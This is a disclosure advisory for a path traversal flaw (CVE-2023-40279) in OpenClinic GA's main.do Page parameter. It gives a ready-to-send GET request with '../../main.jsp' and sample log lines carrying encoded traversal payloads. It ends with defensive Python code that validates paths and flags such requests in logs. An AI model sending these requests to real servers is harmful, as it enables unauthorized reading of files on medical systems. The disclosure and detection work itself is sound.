A Directory Path Traversal vulnerability has been discovered in OpenClinic GA version 5.247.01, affecting the main.do component. This vulnerability enables authenticated attackers to traverse the server's directory structure via the Page parameter in a GET request, allowing for the unauthorized retrieval and execution of files from arbitrary directories.
CVE ID: CVE-2023-40279
Exploit Title: Authenticated Directory Path Traversal via main.do in OpenClinic GA 5.247.01
Date Discovered: 2023-08-14
Affected Software: OpenClinic GA version 5.247.01
Vendor: OpenClinic
Software Link: SourceForge Project Page
Tested Environments: Windows 10, Windows 11
The vulnerability resides in the handling of the Page parameter within the main.do request. Improper validation of this parameter allows authenticated users to construct a GET request that can traverse directories and access or execute files outside the application's intended directories, posing a significant security risk.
Steps to Reproduce:
1. Crafting the Malicious GET Request:
Use a web browser or an HTTP request tool such as curl or Burp Suite.
Construct the GET request as below, using ../../main.jsp to navigate directories and access main.jsp:
GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
Host: 192.168.100.5:10088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cookie: JSESSIONID=[SESSION ID]
Cache-Control: max-age=0
Replace [SESSION ID] with a valid session ID from an authenticated user session.
2. Confirming the Vulnerability:
Send the crafted GET request to the server.
If the server responds by providing the content of main.jsp or any file outside the intended directory, it confirms the existence of a directory path traversal vulnerability. This access could lead to the disclosure of sensitive information or facilitate more severe attacks.
By exploiting this vulnerability, attackers could access sensitive system files or execute unauthorized actions on the server, leading to data breaches and system compromise.
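As an added illustration of the missing validation described above (this is example code, not OpenClinic GA's own; the PAGE_ROOT directory and the access-log lines are constructed assumptions), a Python check that canonicalises a Page value and rejects anything that leaves the allowed directory, plus a scan of log lines for requests that would fail that check:

```python
import re
import posixpath
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed directory that Page values may reference; OpenClinic GA's real layout
# is not given on this page, so this root is a constructed placeholder.
PAGE_ROOT = "/var/lib/openclinic/pages"


def resolve_page(page_param: str, root: str = PAGE_ROOT) -> Optional[str]:
    """Return the absolute path a Page value may load, or None if it escapes root."""
    # Decode twice so single- and double-URL-encoded "../" are both seen as "../".
    decoded = unquote(unquote(page_param))
    # Tested environments were Windows: treat backslashes as separators too.
    decoded = decoded.replace("\\", "/")
    # NUL bytes can truncate the path once it reaches a native file API;
    # absolute paths are never acceptable for a relative Page reference.
    if "\x00" in decoded or decoded.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Containment check after normalisation: exactly root, or strictly below it.
    root = root.rstrip("/")
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


# Constructed access-log lines in common log format; not taken from the page.
LOG_SAMPLE = [
    '192.168.100.7 - - [14/Aug/2023:10:01:02 +0000] "GET /openclinic/main.do?Page=patients/list.jsp HTTP/1.1" 200 4120',
    '192.168.100.7 - - [14/Aug/2023:10:01:09 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 8871',
    '192.168.100.7 - - [14/Aug/2023:10:01:15 +0000] "GET /openclinic/main.do?Page=%2e%2e%2f%2e%2e%2fmain.jsp HTTP/1.1" 200 8871',
]


def flag_traversal_requests(lines: List[str]) -> List[str]:
    """Return log lines whose Page parameter would be rejected by resolve_page."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        # parse_qs URL-decodes once already; resolve_page decodes again.
        params = parse_qs(urlsplit(m.group(1)).query)
        if any(resolve_page(p) is None for p in params.get("Page", [])):
            hits.append(line)
    return hits
```

The containment check is done on the normalised path rather than by searching for "../", so encoded, backslash and mixed forms are all caught by the same rule.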